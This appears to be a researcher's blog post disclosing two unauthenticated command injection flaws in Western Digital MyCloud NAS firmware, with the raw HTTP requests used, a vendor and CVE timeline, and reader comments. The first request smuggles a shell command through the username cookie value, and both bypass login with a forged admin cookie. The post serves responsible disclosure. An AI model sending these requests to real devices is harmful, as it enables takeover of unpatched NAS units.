Command Injection vulnerability in Western Digital MyCloud NAS

The software version of my device is 2.11.142 and my device says that it’s up to date.

The first command injection vulnerability is in the home page URL, “/” in index.php Cookie. To detect successful exploitation I started Wireshark and watched for the pings sent to my IP address from the device.

The request:

GET / HTTP/1.1
Host: wdmycloudex2
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: isAdmin=1; username=admin|echo%20`ping -c 3`; local_login=1

I deleted the PHPSESSID from the cookie and it still worked without any authentication.

The next one was in the /web/google_analytics.php URL.

POST /web/google_analytics.php HTTP/1.1
Host: wdmycloudex2
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://wdmycloudex2/
Content-Length: 52
Cookie: isAdmin=1; username=admin; username=admin; local_login=1; fw_version=2.11.142
Connection: close

I was also able to exploit this one unauthenticated on the LAN by deleting the PHPSESSID from the cookie and replaying the request from a different computer.

I submitted the vulnerabilities to Western Digital on 10/8/2016 and received word that they released a firmware update to remediate on 12/13/2016. These vulnerabilities have been submitted to Mitre for CVE assignment.

Update 1/3/2017: Mitre assigned CVE’s CVE-2016-10107 and CVE-2016-10108.

Update 1/10/2017: I received two new emails from Western Digital after the one they sent on 12/13/2016 telling me they released a firmware patch. They only patched 2016-10108.

On 12/29/2016:

On 1/9/2017:

(Visited 1,985 times, 1 visits today)

5 thoughts on “Command Injection vulnerability in Western Digital MyCloud NAS”

  1. WD claims that all vulnerabilites had been eliminated in the meantime:

    “Firmware Version 2.21.126 (12/20/2016)
    • Resolved security vulnerability related to remote access
    Firmware Version 2.30.165 (04/04/2017)
    • Resolved critical security vulnerabilities.”

    Can you confirm that all 85 vulnerabilities which have been found are in fact purged?

    Best regards from Germany

    1. I only found two of those vulnerabilities. Another researcher discovered all 85. No, I haven’t confirmed. I may one day. 🙂

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.